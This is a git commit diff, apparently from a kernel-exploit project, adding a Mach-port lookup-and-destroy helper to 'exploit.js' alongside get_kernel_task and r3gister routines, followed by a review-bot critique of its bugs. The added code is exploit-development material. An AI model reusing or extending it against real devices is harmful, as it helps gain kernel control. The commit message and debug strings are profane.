| author | spv420 <spv@spv.sh> | 2022-07-27 16:13:31 -0400 |
|---|---|---|
| committer | spv420 <spv@spv.sh> | 2022-07-27 16:13:31 -0400 |
| commit | 5039c6d16ee4e2cfaa9374a941afee789556eeca (patch) | |
| tree | afd4554eec5a148f3d6d73b2610ff5af290123fa /src/js | |
| parent | 945e95ff5d79a6ce50035820777659d4be2c2e53 (diff) | |
fuck it
Diffstat (limited to 'src/js')
| -rwxr-xr-x | src/js/kexp/exploit.js | 28 |
1 files changed, 27 insertions, 1 deletions
diff --git a/src/js/kexp/exploit.js b/src/js/kexp/exploit.js
index 7ec7cc3..55ac673 100755
--- a/src/js/kexp/exploit.js
+++ b/src/js/kexp/exploit.js
@@ -368,6 +368,32 @@ function mach_ports_lookup_shit() {
 // return 0x42603;
 }
 
+function mach_ports_lookup_shit_dealloc() {
+ printf("fuck\n");
+ var arrz = shit_heap(4);
+ printf("fuck\n");
+ write_u32(arrz, 0);
+ printf("fuck\n");
+ var sz = shit_heap(4);;
+ printf("fuck\n");
+ write_u32(sz, 3);
+ printf("fuck\n");
+// var mts = mach_task_self();
+ printf("fuck\n");
+ calls4arg("mach_ports_lookup", task_self, arrz, sz, 0);
+ scall("printf", "done %x %x %x %x\n", read_u32(read_u32(arrz) + 0), read_u32(read_u32(arrz) + 4), read_u32(read_u32(arrz) + 8), read_u32(kp));
+ printf("mpl success\n");
+
+ for (var i = 0; i < read_u32(sz); i++) {
+ if (read_u32(read_u32(arrz) + (i << 2)) != 0) {
+ mach_port_destroy(mach_task_self(), read_u32(read_u32(arrz) + (i << 2)));
+ }
+ }
+
+ return read_u32(read_u32(arrz) + 8);
+// return 0x42603;
+}
+
 var kernel_task_addr = 0;
 function get_kernel_task() {
 var ret = 0;
@@ -458,7 +484,7 @@ again: while (true) {
 var arrmpt = shit_heap(8);
 write_u32(arrmpt, 0);
 write_u32(arrmpt + 4, 0);
- mach_ports_lookup_shit();
+ mach_ports_lookup_shit_dealloc();
 var ret__ = r3gister(mach_task_self(), arrmpt, 2, 3);
 mach_ports_lookup_shit();
 printf("%d %s\n", ret__, mach_error_string(ret__)); |
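Review bot: `mach_ports_lookup_shit_dealloc` returns `read_u32(read_u32(arrz) + 8)` after the loop just above has already passed that same entry to `mach_port_destroy`, so the name it hands back no longer refers to a live port; read it before the loop, `var third = read_u32(read_u32(arrz) + 8);` ahead of the `for`, then `return third;`, or drop the return entirely since the only caller (the one-line substitution in the second hunk) discards it. `var sz = shit_heap(4);;` carries a stray semicolon, and the six `printf("fuck\n")` lines read as leftover tracing that should not land with the function. The lookup is issued with `task_self` while the destroy loop uses `mach_task_self()`; whether those are the same value cannot be seen from this hunk, and the `kp` read in the `scall` line is likewise defined elsewhere. The result of `calls4arg` is never checked, so `printf("mpl success\n")` prints and the loop walks the array even when the lookup failed and its contents are whatever was there before.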
